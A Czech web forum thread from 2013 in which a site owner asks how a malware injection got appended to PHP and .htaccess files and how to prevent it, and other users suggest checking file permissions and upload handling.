I've cleaned this off two websites this week, one a WordPress site and one a 7-year-old custom PHP site. In both cases the malware snippets were appended to numerous files within the site, including index.php files, as well as .htaccess and PHP/HTML/TPL files that contained the words "header" or "footer" in the filename. Very sneaky as clearly they want every pageload on the site to deliver their payload.
Cleaning the infection is relatively simple, and Securi now proclaims my sites as safe. But what I'm having a harder time finding is information on how to *prevent* this sort of compromise in the first place. I've changed my FTP passwords, chmodded many of the affected files and folders to read only 444, and upgraded WP and all plugins to the newest versions. I'm on PHP 5 and don't use any obvious idiocy like register_globals. But is that enough? I'm on shared hosting, is it possible the compromise is happening at the server level?
How does one prevent this garbage from happening in the first place? Recommendations are always vague in this regard. I don't want to spend the rest of my life cleaning Blackhole exploits from my websites.

Tak ... co s tím?

Upravil pipux (2013-09-03 19:58:01)

k4m1l · 2013-09-03 22:10:16

blbá otázka, ale co chmody?
A nějaká cesta kudy uploadovat nějaké soubory? A jejich úprava?
U vlastních systémů vždycky hrozí vyšší riziko bezpečnostní díry. Banální chyba kterou už jsem ale potkal - upload obrázku. Soubor .php přejmenovaný na .jpg uploadnutý a poté jen přejmenovaný v uživatelském profilu a spuštěný.
Prohlédl jste takové "samozřejmosti"?

pipux · 2013-09-03 23:43:50

chmody jsou nastavené na 755 za adresáře, a na 644 za soubory.

Pro upload uživatelských ikon a obrázků do galerií jsem nastavil restrikci formátů (jpg, gif, png), bez možnosti přejmenovávání souborů. Když nad tím ale tak přemýšlím, jako přílohu ke článku lze přejmenovat i přiložit cokoliv, včetně .php souboru. Tuto díru tedy opravím ...

Přesto, pro hack přes přílohy článků by se případný narušitel musel prvně registrovat, a poté založit článek s vlastním přílohovým adresářem (zanechal by po sobě evidentní stopy - což se nestalo).

Jinak, zajímavé postřehy. Vaše "banality a samozřejmosti" mi připadají jako mistrně promyšlené taktické tahy ... a to už jen proto, že jsem se s nimi nikdy nesetkal.

Upravil pipux (2013-09-03 23:46:23)

k4m1l · 2013-09-04 08:42:43

stopy po sobě vůbec zanechat nemusel Jakmile si přečetl config, mohl si s databází dělat co chtěl a tedy i smazat stopy. Ale to je dost komplikované na robota. Kdybyste byl Gmail tak možná, ale jinak si myslím, že by si s tím nikdo tu práci nedal. Hledal bych něco ještě banálnějšího.

JF · 2013-09-04 16:54:27

Ak používate vlastný systém, mali by ste si prekontrolovať či nemáte niekde v kóde bezpečnostnú dieru cez ktorú je možné si na FTP umiestniť vlastný súbor ktorým sa otvori príležitosť na plnú správu vašeho obsahu.

k4m1l · 2013-09-04 17:53:37

JF napsal:

Ak používate vlastný systém, mali by ste si prekontrolovať či nemáte niekde v kóde bezpečnostnú dieru cez ktorú je možné si na FTP umiestniť vlastný súbor ktorým sa otvori príležitosť na plnú správu vašeho obsahu.

Jako bych o pár postů výš napsal totéž

#1 2013-09-03 12:29:26

Hack - Vnořený kód rozbil web

#2 2013-09-03 15:08:51

Re: Hack - Vnořený kód rozbil web

#3 2013-09-03 15:15:04

Re: Hack - Vnořený kód rozbil web

#4 2013-09-03 15:23:50

Re: Hack - Vnořený kód rozbil web

#5 2013-09-03 19:52:32

Re: Hack - Vnořený kód rozbil web

#6 2013-09-03 22:10:16

Re: Hack - Vnořený kód rozbil web

#7 2013-09-03 23:43:50

Re: Hack - Vnořený kód rozbil web

#8 2013-09-04 08:42:43

Re: Hack - Vnořený kód rozbil web

#9 2013-09-04 16:54:27

Re: Hack - Vnořený kód rozbil web

#10 2013-09-04 17:53:37

Re: Hack - Vnořený kód rozbil web

Zápatí